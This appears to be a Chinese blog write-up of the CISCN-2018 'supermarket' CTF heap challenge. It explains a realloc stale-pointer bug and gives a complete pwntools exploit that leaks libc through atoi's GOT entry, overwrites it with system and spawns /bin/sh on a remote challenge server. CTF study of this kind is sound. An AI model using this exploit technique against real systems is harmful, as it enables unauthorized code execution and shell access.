supermarket CISCN-2018-Quals

最新推荐文章于 2022-03-21 10:14:36 发布
最新推荐文章于 2022-03-21 10:14:36 发布
阅读量696 收藏
点赞数
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/97291703
版权

这个题没有想到有一点 。。。。

参考链接

https://blog.csdn.net/qq_33528164/article/details/80144580

这个题目的漏洞点就是

在 realloc  如果 当重新分配的new_size < pre_size, 返回原指针  否则 重新分配  这个就很真实了

而且他这个 还没有改变用户态指针

如果我们操作一波就可以 用另一个指针 随意操控 里面另一个堆user的值了 那么就可以把desc 的指针类型给换了  换成atoigot 表的  就可以了     然后可以 把atoi 改成system 然后一把梭就可以了

exp 如下

from pwn import *

debug=0

context.log_level='debug'
context.arch='amd64'
libc=ELF("./libc6-i386_2.23-0ubuntu10_amd64.so")
elf=ELF("./supermarket")
if debug:
    io=process('./supermarket')
else:
    io=remote('111.198.29.45',50926)

def add(name,price,size,description):
 io.recvuntil("your choice>>")
 io.sendline("1")
 io.recvuntil("name:")
 io.sendline(name)
 io.recvuntil("price:")
 io.sendline(str(price))
 io.recvuntil("descrip_size:")
 io.sendline(str(size))
 io.recvuntil("description:")
 io.sendline(description)

def dele(name):
 io.recvuntil("your choice>>")
 io.sendline("2")
 io.recvuntil("name:")
 io.sendline(name) 

def show():
 io.recvuntil("your choice>>")
 io.sendline("3")

def edit_price(name,price):
 io.recvuntil("your choice>>")
 io.sendline("4")
 io.recvuntil("name:")
 io.sendline(name)
 io.recvuntil("input the value you want to cut or rise in:")
 io.sendline(str(price))

def edit_desc(name,size,description):
 io.recvuntil("your choice>>")
 io.sendline("5")
 io.recvuntil("name:")
 io.sendline(name)
 io.recvuntil("descrip_size:")
 io.sendline(str(size))
 io.recvuntil("description:")
 io.sendline(description)



got_atoi=elf.got['atoi']

if __name__== "__main__":
 add('pipixia',666,0x80,'a'*0x75)
 add('keer',250,0x20,'b'*0x20)
 edit_desc('pipixia',0xc0,"")
 #gdb.attach(io)
 #pause()
 add('kepler',250,0x50,'c'*7)
 #gdb.attach(io)
 payload='cxk\x00'+'a'*16+p32(0x50)+p32(got_atoi)+p32(0x59)
 edit_desc('pipixia',0x80,payload)
 #gdb.attach(io)
 #pause()
 #gdb.attach(io)
 show()
 #print io.recv()
 io.recvuntil("cxk: price.")
 io.recv(16)
 atoi_addr=u32(io.recv(4))
 log.success("atoi_addr "+hex(atoi_addr))

 libc_base_addr=atoi_addr-libc.sym['atoi']
 log.success("libc_base_addr "+hex(libc_base_addr))

 system_addr=libc_base_addr+libc.sym['system']

 log.success("system_addr "+hex(system_addr))
 #gdb.attach(io)
 edit_desc('cxk',0x50,p32(system_addr))
 io.sendline("/bin/sh;")
 io.interactive()
 io.close()

 

pipixia233333
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CISCN-2018-Quals——supermarket分析
Eagle_hwei的博客
02-24 844
supermarket的题目分析 2020-02-01 11:26:17 by hawkJW 题目附件、ida文件及wp链接   这道题实际上我们大体一看,就可以发现是于堆相关的题目,正好用这道题来学习内存的分配机制。这个分配机制是经过查阅的资料综合一些实验,经过自己的理解得出来的,如果有错误,希望各位师傅谅解! 1. 程序流程总览 首先,按照惯例,我们看一下程序开启的保护措施,如图所...
攻防世界-PWN进阶区-echo_back(CISCN-2018-Quals)
weixin_44145820的博客
03-03 826
本题考查的是对格式化字符串漏洞的利用以及修改_IO_2_1_stdin来实现任意写 题目分析 checksec: 发现保护全开 源码分析: echo函数: 在该函数中有明显的格式化字符串漏洞,但是格式化字符串的长度有限制,最长只能为7,这使得许多利用格式化字符串进行任意内存写的方式不能使用,不过泄露信息还是能够做到的 对于信息泄露,首先我们需要获取libc的基地址,这样我们才能计算system...
CISCN-2018-Quals_MS
M3ng@L的博客
03-07 453
CISCN-2018-Quals_Crypto_MSDescriptionDescriptionDescriptionAnalysisAnalysisAnalysisSolving codeSolving~codeSolving codeReferenceReferenceReference keywords:keywords:keywords: 有限域GF(2)下的矩阵乘法 DescriptionDescriptionDescription from Crypto.Util.numbe
CISCN-2018-Quals-SM1
MangoFengC++
03-21 4078
题目 from Crypto.Util.number import getPrime,long_to_bytes,bytes_to_long from Crypto.Cipher import AES import hashlib from random import randint def gen512num(): order=[] while len(order)!=512: tmp=randint(1,512) if tmp not in order:
CISCN-2018-Quals note-service2
qq_41071646的博客
07-23 985
这几天看 wiki 有点头疼 刷会 攻防世界 (那个echo_back 真的头疼 那个 文件结构 不知道是怎么搞出来的) 哪一行代码也不是很清楚是怎么做的 于是就直接跳过那个题目了 note-service2 这个题用ida 分析的时候 看见 show 不能用 笑容 逐渐 凝固 看见edit 不能用的时候 直接关闭了ida 然后发现保护如下 shellcode 一把梭鸭 ...
记录攻防世界CRYPTO进阶区-2
qq_53087690的博客
12-11 372
flag_in_your_hand1&&flag_in_your_hand 题目来源:CISCN-2018-Quals 下载附件并解压: 1.打开index.html 2…查看网页源码
攻防世界-Web萌新-csaw-ctf-2016-quals-mfw(.git泄露、php语句闭合)
Sea_Sand息禅
04-15 4457
打开网页,日常扫描,发现git泄露: git工具下载相关文件(git工具自行百度): 然而flag.php的内容是这样的没什么用,想着也不会这么简单: 网页源码有这一段: 说明flag应该就在flag.php中,再看看index.php,主要是这一部分: <?php if (isset($_GET['page'])) { $page = $_GET['page']; ...
CSAWCTF-2018-pwn-shellcode 题解
lifanxin的博客
11-29 1357
Write Up知识点关键字样本运行静态分析程序逻辑求解脚本一些细节:wp_shellcode.py 知识点关键字 栈溢出,shellcode拆分+组装 样本 样本来自2018年CSAWCTF的pwn题目shellcode 运行 检查文件,发现有两个可以利用的点:   栈溢出保护未开启;   NX保护未开启,存在RWX段。 $ checksec CSAWCTF-2018-pwn [*] '/home/fanxinli/pwnSample/CSAWCTF-2018/CSAWCTF-2018-pwn'
CISCN 2018 PWN task_supermarket
Bill
04-29 1630
全国大学生信息安全竞赛-PWN 序言 第一次在大赛中做出PWN题, 心情有点小激动. 程序运行 0. 结构体 struct node{ char name[16]; int price; int size; char* des; }commodity[15]; 1.MENU 1. add a commodity 2. del a...
CISCN2018-WP
04-30 692
MISC: 验证码: 用token登录 输入好验证码就可以得到flag Picture: 图片隐写,一下就想到binwalk或者winhex打开试试 binwalk打开无果 将这段数据ctrl+shift+c复制出来 用下面python脚本生成zip文件。 import zlib import binascii import base64 id=”...
2018 CISCN reverse
weixin_30735745的博客
05-10 123
2018 CISCN reverse 这题比赛的时候没做出来,主要是心态崩了看不下去。。赛后看了下网上的wp发现不难,是自己想复杂了。这里将我的思路和exp放出来,希望大家一起交流学习。 main函数 它首先是check了输入的前六个字符是否与“CISCN{”匹配,接着使用strtok函数将字符串以“_”分割为三部分,然后分别对这三部分check。 sub_4012DE函数 关键部分如下 将...
NDIS backdoor
04-06 2359
 I just spotted a scary looking rootkit project:http://www.xfocus.net/tools/200602/uay_source.rarthis is written by a guy called Uay, and it has the makings of a powerful rootkit.He has hook
一月刷题总结
qq_46263951的博客
01-21 2506
攻防世界--mail 布尔盲注,session伪造,format格式化字符串漏洞 攻防世界--weiphp weiphp5.0框架漏洞:.git泄漏、SQL注入、文件上传漏洞(利用.phtml) 高校战疫网络安全分享赛: webtmp pickle反序列化漏洞学习 BUUCTF--[CISCN2019 华北赛区 Day1 Web2]ikun cookie伪造,pickle反序列化 攻防世界--Confusion1 SSTI 攻防世界--Confusion2 md5爆破,cookie伪造,php反序
攻防世界 web高手进阶区 10分题 TimeKeeper
闵行小鱼塘
10-19 1389
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是TimeKeeper的writeup
战力爆表|21支明星战队等你围观!
Cyberpeace的博客
10-22 1583
​​大浪淘沙始见金,风卷残云剩为王 21支高校明星CTF战队初露王者之相 晋级XCTF高校网络安全专题挑战赛总决赛 2021年10月29日-10月30日东莞·华为松山湖园区 集结再出发,踏上新征途! 整装待发之际 小编汇总了21支明星战队的战力信息 快来pick你心目中的最强王者 为王者的上分之路疯狂打call!!! 一.Vidar-Team 杭州电子科技大学 Vidar-Team成立于2008年9月,队名“Vidar”来源于北欧神话"诸神黄昏"中幸免于难、带领人类重建了家园的神Víðarr,是由杭州电子
ciscn 2018 部分writeup
StriveBen的博客
05-07 3946
ciscn 2018 部分writeup flag in your hand 这是一道js解密的题目: 发现checkToken函数数里返回的s===”FAKE-TOKEN”,使用这个字符串却得到wrong,而且ic后面被更改了: 跟踪bm函数: 这里charCodeAt() 方法可返回指定位置的字符的 Unicode 编码; 在ck函数里,ic的值又被更改了,所以要想...
CISCN-2018-Quals 2ex 攻防世界
qq_41071646的博客
06-07 1663
这个题目 感觉 挺。。。。 又是 MIPS框架的东西 本来一直想配置一下ida 那个插件但是 感觉很麻烦 我就没有配置 然后还是用的 jeb 然后 。。。。 跟着跟着就跟丢了 2333 主要对东西不太了解 但是 好好看一下 还是 能跟的 一开始没有看到这个细节 跟到后面发现了这个可疑字符串 去jeb 反编译一下 看看 这nm的不就是base64 看...
2018 CISCN Writeup
weixin_30883777的博客
05-03 501
10.0.0.55 Writeup Web 0x01 easyweb 解题思路 题目很脑洞 用户名admin 密码123456进去可得到flag(密码现在换了) 解题脚本 无 Reverse 0x02 2ex 解题思路 题目给了一个ELF和一个out文件, out文件 运行ELF文件, 发现它会根据我的输入给出对应输出, 格式与out文件中的内容相仿 尝试直接爆破, 得到 flag{change...
2018年全国大学生信息安全竞赛 CISCN Writeup
热门推荐
aptx4869_li的博客
06-07 1万+
逆向:RE:题目文件:链接:点击打开链接 密码:hyzy这题当时做的时候陷入了出题人的陷阱,上来找到了“关键部分”就开始逆,但是遇到了很多问题,因为有很多函数,而且篇幅都不小,而且每个函数还要调用其他一大堆函数,这就大大增加了工作量,后面实在看不下去了,就放弃了。后面找到一些大佬的writeup看了看,原来是思路的问题:总结一下:逆向赛题一般工作量不会大到让你逆不了,一下锁定了十七八个函数肯定是有...
ASIS+Quals
最新发布
10-18
ASIS是Ada语义接口规范,它是已发布的国际ISO标准(ISO / IEC 15291:...而Quals是一种基于ASIS的工具,它可以用于静态代码分析和漏洞检测。Quals可以帮助开发人员发现和修复代码中的安全漏洞,从而提高软件的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值